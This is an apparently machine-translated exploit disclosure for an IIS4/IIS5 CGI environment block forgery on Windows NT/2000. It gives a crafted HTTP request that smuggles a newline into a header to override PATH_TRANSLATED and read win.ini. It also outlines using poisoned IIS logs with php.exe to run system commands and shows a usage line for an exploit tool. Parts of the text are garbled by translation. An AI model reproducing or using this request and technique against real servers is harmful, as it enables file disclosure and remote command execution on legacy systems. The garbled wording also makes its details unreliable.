IIS4 \ IIS5 CGI Environment block forgery 0 day

IIS4 \ IIS5 CGI Environment block forgery 0 day

IIS4 \ IIS5 CGI Environment block forgery 0 day

 

It was found that the current 0-day was around 14 years ago.

It is an IIS4 \ IIS5 vulnerability. The corresponding operating systems are winnt and win2000. Microsoft no longer supports these software and Their strategy is to eliminate these systems. After 11 years of reporting, Microsoft decided not to fix them. It is a very serious vulnerability, but the affected software currently has a relatively low usage, but the total amount is also quite large.


Block forgery vulnerability in IIS loading CGI Environment


When IIS4 and IIS5 load CGI and process environment blocks, the \ n character is incorrectly replaced with \ x00, which can forge any environment block. When IIS loads CGI, it adds "HTTP _" prefix to its request and environment variables to distinguish them from local environment variables, by replacing "\ n" with "\ 0", you can remove these prefixes to forge any environment block variables. Attackers can submit "a = B \ nPATH_TRANSLATED: var" in the http header to execute arbitrary commands.

Cgi.pdf has two methods, one for compiling executable programs compiled into .exe. Common examples include counters, applications developed by some websites, and WEB applications with a wide range of applications. There is also a general script mapped to. EXE interpretation execution (isapi is mapped to. dll, not affected), these common include PHP \ PERL scripts.

For specific hazards, refer to the processing method of the CGI program on the Environmental block, which may result in some results:

1. Buffer overflow occurs when CGI processes local environment variables. Some CGI processes local environment variables because these variables cannot be set or are originally credible, and the buffer size check is not considered.

2. Some environment block variables affect the processing logic and trust relationship of some CGI instances.

3. When loading a dll or a process, the attacker's program is loaded due to forged path environment variables.

 

 

1、win2000+iis5 .php phpphp.exe (that is, cgi Mode. If. dll is shot in isapi mode, this vulnerability does not exist)

2. Send a request:

"GET/. php HTTP/1.1 \ r \ na = B \ nPATH_TRANSLATED: c: \ windows \ win. ini \ r \ nHOST: 192.168.0.1 \ r \ n"

3. iis returns the content of win. ini.

You can also use iis's log file to write the php Command, and use php.exe to call iis log files to execute system commands.

 

 

usage: 

 

iisexp411 127.0.0.1  /AprilFools'Day.php  PATH_TRANSLATED  c:\windows\win.ini